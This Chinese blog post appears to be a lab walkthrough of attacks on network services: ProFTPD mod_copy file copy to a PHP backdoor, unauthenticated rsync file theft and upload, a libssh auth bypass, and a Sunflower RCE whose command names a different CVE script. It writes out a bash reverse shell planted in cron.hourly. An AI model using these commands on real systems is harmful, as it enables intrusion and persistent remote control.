当前位置：首页 > news >正文

服务攻防-应用协议cve

news 2025/9/14 0:31:59

Cve-2015-3306

背景：

ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。

任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行，默认情况下，该服务在“nobody”用户的权限下运行。通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录，可以实现PHP远程代码执行。

python exploit.py --host 123.58.224.8 --port 52483 --path "/var/www/html/"

123.58.224.8:52483

port从21映射到了52483

网页80端口映射到了

http://123.58.224.8:24391/backdoor.php?cmd=id

利用exp来实现任意命令执行

二.配置不当-未授权访问-Rsync 文件备份

rsync 是 Linux 下一款数据备份工具，支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口，如果目标开启了 rsync 服务，并且没有配置 ACL 或访问密码，我们将可以读写目标服务器文件。

下面是靶机的873反弹到21351端口，正常的话看默认873端口就ok

rsync rsync://123.58.224.8:21351/

读取文件：

rsync rsync://123.58.224.8:21351/src

下载文件：

rsync rsync://123.58.224.8:21351/src/etc/passwd ./

将passwd下载到当前目录

上传文件：

rsync -av passwd rsync://123.58.224.8:21351/src/tmp/passwd

将当前目录的passwd上传到目标靶机tmp目录下

rsync rsync://123.58.224.8:21351/src/tmp/passwd

读取任务计划

rsync rsync://123.58.224.8:21351/src/etc/crontab ./

创建文件

touch 1

vim 1
/bin/bash -i >& /dev/tcp/192.168.83.156/5566 0>&1

chmod +x 1

rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly

rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

一、漏洞描述

libssh 是一个提供 SSH 相关接口的开源库，包含服务端、客户端等。其服务端代码中存在一处逻辑错误，攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息，绕过认证过程，未授权访问目标 SSH 服务器。

二、漏洞影响

libssh 0.6 及更高版本具有身份验证绕过漏洞。

libssh 版本 0.8.4 和 libssh 0.7.6 已发布，以解决此问题

python3 libssh.py 192.168.83.136 2222 'whoami'

向日葵 CVE-2022-10270 远程代码执行漏洞

简介：向日葵是一款免费的，集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

影响版本：

向日葵个人版：windows <=11.0.0.33

向日葵简约版：<= v1.0.1.43315

连接上了但是无回显

python3 cve-2022-23131.py http://20.16.77.158 Admin

服务攻防-应用协议cve

Cve-2015-3306

读取文件：

下载文件：

上传文件：

创建文件

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

向日葵 CVE-2022-10270 远程代码执行漏洞

相关文章：

服务攻防-应用协议cve

Springcloud之gateway的使用详解

中望CAD 建筑 v2024 解锁版下载、安装教程 (超强的CAD三维制图)

windows edge自带的pdf分割工具（功能）

HTML5实现好看的天气预报网站源码

比较（八）利用python绘制指示器

【体外诊断】ARM/X86+FPGA嵌入式计算机在医疗CT机中的应用

力扣 28找到字符串中第一个匹配项的下标 KMP算法

JavaScript(10)——匿名函数

图片上传成功却无法显示：静态资源路径配置问题解析

【转盘案例-弹框-修改Bug-完成 Objective-C语言】

Perl 基础语法

【嵌入式开发之标准I/O】二进制文件的读写及实验

Arduino学习笔记1——IDE安装与起步

一个注解解决重复提交问题

在qt的c++程序嵌入一个qml窗口

Vue的依赖注入：组件树中的共享数据与功能

softmax 函数的多种实现方式包括纯C语言、C++版本、Eigen版本等

R语言学习笔记11-读取csv-xlsx-txt-json-pdf-lua格式文件

Vue的计算属性和方法有什么区别

linux之kylin系统nginx的安装

大型活动交通拥堵治理的视觉算法应用

定时器任务——若依源码分析

Rust 异步编程

HTML前端开发：JavaScript 常用事件详解

python报错No module named ‘tensorflow.keras‘

IP如何挑？2025年海外专线IP如何购买？

HubSpot推出与ChatGPT的深度集成引发兴奋与担忧

uniapp 小程序学习（一）

DeepSeek源码深度解析 × 华为仓颉语言编程精粹——从MoE架构到全场景开发生态